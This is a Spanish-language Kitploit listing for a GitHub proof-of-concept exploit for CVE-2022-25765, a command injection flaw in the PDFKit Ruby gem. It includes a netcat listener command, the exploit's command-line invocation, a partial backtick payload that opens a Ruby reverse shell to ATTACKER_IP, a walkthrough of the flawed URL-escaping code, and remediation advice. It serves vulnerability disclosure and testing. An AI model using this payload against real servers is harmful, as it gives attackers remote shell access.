Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-25765 — Exploit para CVE-2022-25765 | Kitploit
Herramientas/GitHubGitHub/lowercasenumbers/cve-2022-25765
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHublowercasenumbers/cve-2022-25765

CVE-2022-25765

Exploit para CVE-2022-25765

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para CVE-2022-25765

Un pequeño exploit PoC para CVE-2022-25765, PDFkit-CMD-Injection

Uso

  1. Inicia un listener de netcat en tu máquina de ataque:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Ejecuta el exploit:

    root@kitploit:~
    python cve-2022-25765.py -t http://TARGET_IP:PORT -l YOUR_IP -p YOUR_PORT
    

Ejemplo:

root@kitploit:~
python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444

Parámetros:

  • -t, --target: URL objetivo que ejecuta PDFKit vulnerable
  • -l, --lhost: Tu dirección IP para la conexión de reverse shell
  • -p, --lport: Tu puerto para la conexión de reverse shell (debe coincidir con tu listener de netcat)

Información de la Vulnerabilidad

ID de CVE: CVE-2022-25765 Puntuación CVSS v3.1: 9.8 (Crítica) Puntuación EPSS: 71.381% (percentil 99) CWE: CWE-77 - Neutralización inadecuada de elementos especiales utilizados en un comando

Versiones Afectadas

  • Vulnerable: PDFKit 0.0.0 - 0.8.6
  • Corregida: PDFKit 0.8.7.2+

Descripción

PDFKit es una gema de Ruby que convierte HTML a PDF usando la herramienta de línea de comandos wkhtmltopdf. La vulnerabilidad existe en cómo PDFKit maneja los parámetros de URL antes de pasarlos a los comandos del shell del sistema para la generación de PDF.

Detalles Técnicos

La vulnerabilidad reside en lib/pdfkit/source.rb donde la sanitización de URL está implementada incorrectamente:

root@kitploit:~
def shell_safe_url
  url_needs_escaping? ? URI::DEFAULT_PARSER.escape(@source) : @source
end

El Problema:

  1. PDFKit usa una lógica defectuosa para determinar si una URL necesita escaparse
  2. Los metacaracteres del shell (backticks, punto y coma, tuberías, etc.) pueden omitir esta verificación
  3. Las URLs sin sanitizar se pasan directamente a los comandos del shell que invocan wkhtmltopdf
  4. Los atacantes pueden inyectar comandos arbitrarios que se ejecutan en el servidor

Vector de Ataque:

  • Complejidad: Baja
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna
  • Acceso a la Red: Requerido

Cómo Funciona Este Exploit

Este PoC explota la vulnerabilidad al:

  1. Inyectar una URL maliciosa que contiene sustitución de comandos con backticks
  2. El payload: http://ATTACKER_IP:PORT/?name=%20` ruby -rsocket...`'
  3. PDFKit no logra sanitizar los backticks en el parámetro de la URL
  4. Cuando wkhtmltopdf procesa la URL, el shell ejecuta la reverse shell de Ruby
  5. El sistema objetivo se conecta de vuelta al listener del atacante

Impacto

  • Confidencialidad: Alta - Acceso completo al sistema
  • Integridad: Alta - Capacidad de modificar cualquier archivo
  • Disponibilidad: Alta - Potencial de interrupción del sistema

Requisitos Previos para una Explotación Exitosa

En el Sistema Objetivo:

  • Versión de PDFKit vulnerable (< 0.8.7.2)
  • Ruby instalado (requerido para el payload de reverse shell)
  • La aplicación acepta URLs controladas por el usuario pasadas a PDFKit
  • Sin filtrado de egreso que bloquee las conexiones salientes

Remediación

  1. Actualiza PDFKit a la versión 0.8.7.2 o posterior
  2. Validación de Entradas: Implementa una lista blanca estricta para las entradas de URL
  3. Sandboxing: Ejecuta los procesos de PDFKit en contenedores aislados con privilegios mínimos
  4. Segmentación de Red: Restringe las conexiones salientes desde los servicios de generación de PDF
  5. Reglas WAF: Implementa reglas para detectar metacaracteres de shell en los parámetros de URL

Referencias

  • NVD - CVE-2022-25765
  • GitHub Advisory GHSA-rhwx-hjx2-x4qr
  • PDFKit Issue #507
  • RubySec Advisory
Descargar herramienta